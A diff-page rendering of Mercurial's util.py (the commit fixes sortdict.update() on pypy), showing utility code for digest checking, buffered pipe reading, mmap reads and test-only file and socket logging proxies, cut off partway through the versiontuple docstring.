##// END OF EJS Templates
util: fix the signature for the pypy override of sortdict.update()...
Matt Harbison -
r47662:64400d05 default
parent child Browse files
Show More
@@ -1,3730 +1,3732 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
def setumask(val):
    # type: (int) -> None
    """Update the process umask to ``val``; used by the chg server.

    No-op on Windows, where the POSIX umask is not meaningful.
    """
    if pycompat.iswindows:
        return
    global umask
    os.umask(val)
    # Keep both the module-level and the platform module's copy in sync,
    # restricted to the permission bits.
    masked = val & 0o777
    platform.umask = umask = masked
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
def bitsfrom(container):
    """Return the bitwise OR of every integer flag in ``container``.

    An empty container yields 0.
    """
    mask = 0
    for flag in container:
        mask |= flag
    return mask
175 175
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    suffix = (
        b"\n(compatibility will be dropped after Mercurial-%s,"
        b" update your code.)"
    ) % version
    warnings.warn(
        pycompat.sysstr(msg + suffix), DeprecationWarning, stacklevel + 1
    )
    # on python 3 with chg, we will need to explicitly flush the output
    sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` into every tracked hash object."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest for ``key``, aborting on unknown types."""
        if key not in DIGESTS:
            # This error path previously interpolated the stale module-level
            # loop variable ``k`` instead of ``key``, so the abort message
            # named the wrong digest type.
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
281 281
282 282
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the digester as we go."""
        chunk = self._fh.read(length)
        self._digester.update(chunk)
        self._got += len(chunk)
        return chunk

    def validate(self):
        """Abort unless exactly ``size`` bytes were seen and digests match."""
        if self._got != self._size:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s')
                    % (name, expected, actual)
                )
318 318
319 319
try:
    # Python 2 has a builtin ``buffer``; keep it when it exists.
    buffer = buffer  # pytype: disable=name-error
except NameError:
    # Python 3: emulate buffer() with a zero-copy memoryview slice.

    def buffer(sliceable, offset=0, length=None):
        """Return a zero-copy view of ``sliceable`` starting at ``offset``.

        When ``length`` is given, the view covers at most that many items.
        """
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset : offset + length]
328 328
329 329
330 330 _chunksize = 4096
331 331
332 332
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input  # the raw, unbuffered input file object
        self._buffer = []  # pending byte chunks, oldest first
        self._eof = False  # set once os.read() returns no data
        self._lenbuf = 0  # total number of bytes currently buffered

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # Delegate the closed state to the underlying pipe.
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # Fill until ``size`` bytes are buffered or EOF, then return at
        # most ``size`` bytes (fewer only at end of stream).
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        # Perform at most one low-level read (only when nothing is
        # buffered), then return what is available, capped at ``size``.
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first b'\n' in the newest chunk, -1 if absent.
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find(b'\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find(b'\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = b''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data) :]
        if buf:
            # Collapse the leftover back into a single-chunk buffer.
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
441 441
442 442
def mmapread(fp, size=None):
    """Return a read-only mmap of ``fp`` (or b'' for empty/zero requests).

    ``size`` semantics: 0 means "zero bytes" (handled here, because
    mmap.mmap() treats a length of 0 as "the whole file"), None means
    "map everything", any other value maps that many bytes.
    """
    if size == 0:
        # size of 0 to mmap.mmap() means "all data"
        # rather than "zero bytes", so special case that.
        return b''
    length = 0 if size is None else size
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, length, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return b''
        raise
459 459
460 460
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    # __slots__ keeps the proxy itself attribute-free so that attribute
    # access can be forwarded to the wrapped object without ambiguity.
    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, fh, observer):
        # object.__setattr__ is required because our own __setattr__
        # forwards everything to the wrapped file object.
        object.__setattr__(self, '_orig', fh)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        # Names we implement (and therefore observe) ourselves; everything
        # else is fetched straight from the wrapped file object.
        ours = {
            '_observer',
            # IOBase
            'close',
            # closed if a property
            'fileno',
            'flush',
            'isatty',
            'readable',
            'readline',
            'readlines',
            'seek',
            'seekable',
            'tell',
            'truncate',
            'writable',
            'writelines',
            # RawIOBase
            'read',
            'readall',
            'readinto',
            'write',
            # BufferedIOBase
            # raw is a property
            'detach',
            # read defined above
            'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, '_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    # All wrappers below follow the same pattern: route the call through
    # _observedcall() so the observer is notified with the result and the
    # original arguments.

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'close', *args, **kwargs
        )

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'fileno', *args, **kwargs
        )

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'flush', *args, **kwargs
        )

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'isatty', *args, **kwargs
        )

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readable', *args, **kwargs
        )

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readline', *args, **kwargs
        )

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readlines', *args, **kwargs
        )

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seek', *args, **kwargs
        )

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'seekable', *args, **kwargs
        )

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'tell', *args, **kwargs
        )

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'truncate', *args, **kwargs
        )

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writable', *args, **kwargs
        )

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'writelines', *args, **kwargs
        )

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read', *args, **kwargs
        )

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readall', *args, **kwargs
        )

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'readinto', *args, **kwargs
        )

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'write', *args, **kwargs
        )

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'detach', *args, **kwargs
        )

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'read1', *args, **kwargs
        )
637 637
638 638
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _fillbuffer(self, size=_chunksize):
        # The base class calls _fillbuffer() both with and without an
        # explicit size (unbufferedread() passes one). The previous
        # override took no ``size`` argument, so those calls raised
        # TypeError, and the observer was always told _chunksize bytes
        # were requested even when a different amount was.
        res = super(observedbufferedinputpipe, self)._fillbuffer(size)

        fn = getattr(self._input._observer, 'osread', None)
        if fn:
            fn(res, size)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, 'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, 'bufferedreadline', None)
        if fn:
            fn(res)

        return res
679 679
680 680
# Socket methods that socketproxy implements itself (and therefore
# observes/logs); any other attribute is delegated straight to the
# wrapped socket.
PROXIED_SOCKET_METHODS = {
    'makefile',
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
}
695 695
696 696
class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, sock, observer):
        # object.__setattr__ is required because our own __setattr__
        # forwards everything to the wrapped socket.
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        # This previously forwarded to 'recv_info', a method that does not
        # exist on sockets, so any recv_into() call through the proxy
        # raised AttributeError instead of receiving data.
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )
818 818
819 819
class baseproxyobserver(object):
    """Shared state and payload-logging helper for I/O observers."""

    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh  # file object the log lines are written to
        self.name = name  # label prefixed to every log line
        self.logdata = logdata  # whether payload bytes are logged
        self.logdataapis = logdataapis  # whether API calls are logged

    def _writedata(self, data):
        # Emit the payload portion of a log record; when API logging is on,
        # the caller has already written the call description and we only
        # need to finish (or continue) that line.
        if not self.logdata:
            if self.logdataapis:
                self.fh.write(b'\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(b': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(data))
                )
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(b':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write(
                b'%s> %s\n' % (self.name, stringutil.escapestr(line))
            )
        self.fh.flush()
855 855
856 856
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads  # whether read-side operations are logged
        self.writes = writes  # whether write-side operations are logged

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        # res is the number of bytes actually read into dest.
        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)
955 955
956 956
def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Turn a file object into a logging file object."""

    # Build the observer that records activity to ``logh``, then wrap the
    # real file object in a proxy that reports to it.
    watcher = fileobjectobserver(
        logh,
        name,
        reads=reads,
        writes=writes,
        logdata=logdata,
        logdataapis=logdataapis,
    )
    return fileobjectproxy(fh, watcher)
971 971
972 972
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    The ``reads``/``writes``/``states`` flags select which categories of
    socket calls are logged.  ``logdataapis`` controls whether the API
    call summary lines are written; payload dumping is delegated to the
    base class's ``_writedata()``.
    """

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        # Payload is written regardless of logdataapis; _writedata() itself
        # honors the logdata flag.
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # Guard the API line with logdataapis for consistency with the
        # other methods; it was historically written unconditionally.
        if self.logdataapis:
            self.fh.write(
                b'%s> send(%d, %d) -> %d'
                % (self.name, len(data), flags, len(res))
            )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # socket.sendto() has two signatures: (data, address) and
        # (data, flags, address); disambiguate by whether address was given.
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )
1106 1106
1107 1107
def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket.

    Activity on ``fh`` is reported to ``logh``; the flags are forwarded
    to ``socketobserver`` unchanged.
    """
    flags = {
        'reads': reads,
        'writes': writes,
        'states': states,
        'logdata': logdata,
        'logdataapis': logdataapis,
    }
    return socketproxy(fh, socketobserver(logh, name, **flags))
1130 1130
1131 1131
def version():
    """Return the Mercurial version string, or b'unknown' if unavailable."""
    try:
        from . import __version__
    except ImportError:
        # Not running from an installed/built tree; no version metadata.
        return b'unknown'
    return __version__.version
1140 1140
1141 1141
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
